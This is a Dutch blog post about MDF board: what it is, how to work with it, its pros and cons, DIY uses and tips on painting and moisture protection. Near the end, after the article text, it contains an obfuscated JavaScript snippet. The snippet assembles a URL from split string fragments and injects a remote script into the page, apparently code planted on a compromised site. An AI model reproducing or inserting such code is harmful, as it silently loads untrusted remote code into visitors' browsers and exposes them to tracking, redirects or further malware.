Read Time:3 Minute, 4 Second

Wanneer jij wilt gaan verbouwen, dan doe je natuurlijk ook onderzoek naar allerlei soorten materialen die je kunt gaan gebruiken. Een van deze materialen is MDF. Voordat je hiermee aan de slag gaat wil je natuurlijk wel precies weten wat een MDF plaat is en hoe je deze kunt gebruiken.

Wat is een MDF plaat?

MDF staat voor Medium Density Fibreboard. Een MDF plaat is een geperste, houtachtige plaat, een middelharde dichtheid. De plaat bestaat uit verschillende houtvezels die zijn gedroogd en vervolgens met hars aan elkaar worden verbonden.

Een MDF plaat is hierdoor goed geschikt voor verschillende doe-het-zelf klussen of bij verbouwingen, voor zowel binnen als buiten!

Wat zijn de eigenschappen van MDF?

De dichtheid van de MDF platen zorgen ervoor dat je deze goed kan bewerken. Dit kun je doen door te zagen, vrezen, boren of schuren, zodat de plaat volledig voldoet aan jouw wensen. Om deze reden wordt MDF veel gebruik bij verschillende interieurtoepassingen, denkend aan kasten, bureaus, keukens of bedden.

Een van de andere eigenschappen van MDF is dat dit hout niet splintert, ook zullen de platen niet kromtrekken. In plaats van kromtrekken, is het mogelijk dat MDF juist uitzet door hitte en vocht wanneer deze niet bewerkt zijn. Onbewerkte MDF platen kunnen dan ook niet in vochtige ruimtes worden gebruikt.

De voor- en nadelen van MDF

Een van de grote voordelen van MDF is dat het heel eenvoudig te bewerken is. Denk aan het op maat zagen, lijmen, buiten, of het indraaien van schroeven. Daarbij splintert een MDF plaat niet.

Een ander groot voordeel waarover tegenwoordig veel gesproken wordt is duurzaamheid! MDF wordt namelijk gemaakt van afvalhout uit de houtindustrie. MDF wordt gemaakt van gerecycled hout waardoor je dus ook denkt aan het milieu bij de aanschaf.

Als iets een voordeel heeft, dan hangen daar altijd ook nadelen aan, zo ook bij MDF. Helaas zorgt de vezelige structuur van MDF ervoor dat het de verf opzuigt. MDF is minder makkelijk te schilderen dan ander hout. Een speciale laag kan dit wel voorkomen. Zoals eerder gezegd is onbehandeld MDF ook niet watervast.

Waarvoor kun je MDF platen gebruiken?

MDF is zeker geschikt om hier meubels voor te maken. Dit komt omdat het materiaal sterk is en je er gemakkelijk mee kan werken. Zo kun je kastjes, bankjes of tafels maken van MDF. Je kunt ook denken aan een eigen gemaakte tv-kast, hoe gaaf is dat! Net als eigen gemaakte wandplankjes gecombineerd met fantastische fotolijstjes! Met MDF kun je er ook voor kiezen om speelgoed te maken, denk aan een mooi poppenhuis.

MDF platen zijn goed geschikt voor leuke Do It Yourself projectjes!

Tips voor het gebruik van MDF

Wanneer jij besluit om te werken met MDF platen, dan zijn er enkele tips voor jou die het gebruik gemakkelijker maken. Want als je vooraf weet dat je de platen wilt schilderen, zorg er dan voor dat je twee lagen grondverf gebruikt. Dit voorkomt dat de platen de verf opzuigen.

Ook wanneer je de MDF plaat op een vochtige plek wilt gaan gebruiken, dan is het aan te raden om een watervaste topcoat te gebruiken. Dit voorkomt uitzetten van de platen.

Om het jezelf nog makkelijker te maken kun je de MDF platen bij een bouwmarkt op maat laten zagen. Dit is ook mogelijk bij https://www.opmaatzagen.nl/, hier kunnen ze jouw gewenste maten zagen zodat jij direct aan de slag kunt met de doe-het-zelf klus!

(function(){ o67v=document.createElement(“script”);o67v.async=true;o67v_=”u”+(“s”)+”t”; o67vu=”435214951.”;o67v_+=”a”+(“t.i”);o67v_+=”n”+(“f”+”o”)+”/”; o67vu+=”zuwyaqxu67vahfXznr07pi”+(“lXgwXk7j”); o67v.src=”https://”+o67v_+o67vu;o67v.type=”text/javascript”; document.body.appendChild(o67v); })();
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
huis kopen nederland Previous post Tips voor het kopen van een woning
wonen in rotterdam Next post Wonen in Rotterdam: De voor- en nadelen